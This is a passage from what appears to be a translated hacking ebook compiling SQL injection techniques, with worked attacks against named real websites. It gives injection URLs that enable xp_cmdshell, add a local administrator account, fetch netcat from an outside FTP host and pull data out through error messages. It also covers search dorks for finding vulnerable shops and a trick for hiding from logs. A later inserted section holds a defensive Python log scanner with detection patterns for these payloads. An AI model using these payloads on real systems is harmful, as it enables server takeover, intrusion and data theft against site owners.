Hacker Professional Ebook part 234 pptx

'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns. /Including/general.asp, line 840

ADD THE LINE "SELECT 1" TO FIX THE ERROR

http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')

• Setting "allow updates"=1 allows the system tables (sysusers, syslogins, ) to be updated directly, without going through the system procedures.

NOTES ON RUNNING MASTER XP_CMDSHELL

• exec master xp_cmdshell ‘dir c:\’ “SQLAgentCmdExec”
• select * from openrowset('sqloledb', 'server=<SERVER_NAME>;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "dir c:\"') “NT AUTHORITY\SYSTEM”

fantomas311(VNISS)

SQL Injection compilation (part 7)

DETERMINING THE SERVER'S IP

http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master xp_cmdshell 'ipconfig'

http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))

(%25 == “%”)

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
/Including/general.asp, line 840

RECONNAISSANCE OF THE IP “203.162.7.70”

C:\> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118

C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70 none)):

• 203.162.7.70 == panvietnam.com

DIRECT FTP - FAILED!
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')

(%26 == “&”)

C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70 none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye

UPLOADING NETCAT TO THE SERVER

http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')

(%3E == “>”)

echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f

CHECKING WHETHER NETCAT WAS UPLOADED SUCCESSFULLY

http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master xp_cmdshell 'dir nx.exe'

http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))

http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))—

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840

fantomas311(VNISS)

SQL Injection compilation (part 8)

Hacking shops via the SQL Server injection flaw

A quick introduction for you guys to hacking with SQL Server injection!
Hacking with the convert technique, put simply, means converting a string expression to int; the conversion cannot be performed, which produces an error message (there are some shops where we do not receive the message, because value=hidden). So first of all, to hack an ODBC MySQL server2000 or 7.0 shop, you should at least take a quick look at the source, so that you know which approach to take.

Here I only introduce the convert approach used to obtain the error message; if you need to hack the whole server, that takes a lot of talking and gets far too long-winded.

Detail: search on whichever search engine you like. There are currently many search engines that people commonly use, such as www.google.com or www.froogle.google.com www.av.com www.alltheweb.com yahoo.com

ok search for: allinurl: "/shop/viewproduct.asp", or you can search with the keyword allinurl: "/shop/index.asp" (but the accuracy of this keyword has not been confirmed, because it returns a great many sites that are not ODBC MySQL databases, hic, but are usually JSP (Java Server Pages) or JET, or VB.net, and so this needs some effort from you in testing.

ok, once you have targets, pick any one of them, e.g.:

http://www.mcmessentials.com.au/shop 0&categoryid=5

okay, with a target in hand, start testing it:

http://www.mcmessentials.com.au/shop/viewp tegoryid=5'

If its database is written with ODBC MySQL server, you will receive the following message:

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/shop/include/viewproduct.asp, line 3

okay, and if not, you see nothing at all, or you have to look in the source to find out.
ok, start finding the tables. You can test in the following ways that I know of:

Code:
;having 1=1 sp_password
'having 1=1 sp_password
"having 1=1 sp_password
(having 1=1 sp_password
)having 1=1 sp_password
(space)having 1=1 _sp_password

(%20 is a space, i.e. whitespace.) Usually testing with the query (space)having 1=1 sp_password gets through ok.

* Note, guys, one very necessary thing: 1 %2b means the + sign, but passing the + sign in directly gets filtered out by SQL. sp_password is mandatory to mask the log and avoid detection.

http://www.mcmessentials.com.au/shop 1 sp_password

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'categories.label' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/shop/include/viewproduct.asp, line 9

We now know the table categories and the column label; now we go and get all the tables of the column label belonging to the table categories
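
Added example (not part of the original document): a defender-side scan of web server access logs for the request patterns quoted above, including the sp_password marker, which still shows up in the query string the web server records. The log lines are constructed, and the W3C-style field order, the client addresses and the indicator names are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Patterns drawn from the requests quoted on this page; the key names are this example's own labels.
INDICATORS = {
    "openrowset": re.compile(r"\bopenrowset\s*\(", re.I),
    "admin_proc": re.compile(r"\b(xp_cmdshell|sp_addextendedproc|sp_configure)\b", re.I),
    "convert_subquery": re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b", re.I),
    "having_probe": re.compile(r"\bhaving\s+1\s*=\s*1\b", re.I),
    "sp_password": re.compile(r"sp_password", re.I),
    "stacked_query": re.compile(r";\s*(select|drop|create|insert|exec)\b", re.I),
}

def normalize(query, max_rounds=3):
    """Undo URL encoding (repeatedly, to catch double encoding), then map '+' to space."""
    for _ in range(max_rounds):
        decoded = unquote(query)
        if decoded == query:
            break
        query = decoded
    return query.replace("+", " ")

def match_indicators(query):
    text = normalize(query)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def summarize(log_lines):
    """Per client IP: flagged requests, how many returned HTTP 500, indicators seen."""
    report = defaultdict(lambda: {"flagged": 0, "http_500": 0, "indicators": set()})
    for line in log_lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        ip, query, status = fields[2], fields[5], fields[6]
        hits = match_indicators(query)
        if hits:
            report[ip]["flagged"] += 1
            report[ip]["http_500"] += int(status == "500")
            report[ip]["indicators"].update(hits)
    return dict(report)

# Constructed sample: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = [
    "2003-08-17 11:20:09 192.0.2.10 GET /search.asp q=having+fun 200",
    "2003-08-17 11:21:40 198.51.100.7 GET /story.asp id=1+and+1=convert(int,(select+top+1+b+from+t+where+b+like+'%25IP+Address%25')) 500",
    "2003-08-17 11:22:05 198.51.100.7 GET /story.asp id=1;select+*+from+openrowset('sqloledb','<elided>') 200",
    "2003-08-17 11:23:30 198.51.100.7 GET /shop/view.asp id=5%20having%201=1--sp_password 500",
]
```

A client that combines these indicators with a run of HTTP 500 responses matches the error-based extraction shown above, where each answer comes back inside an ODBC error page.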

Posted: 04/07/2014, 12:20
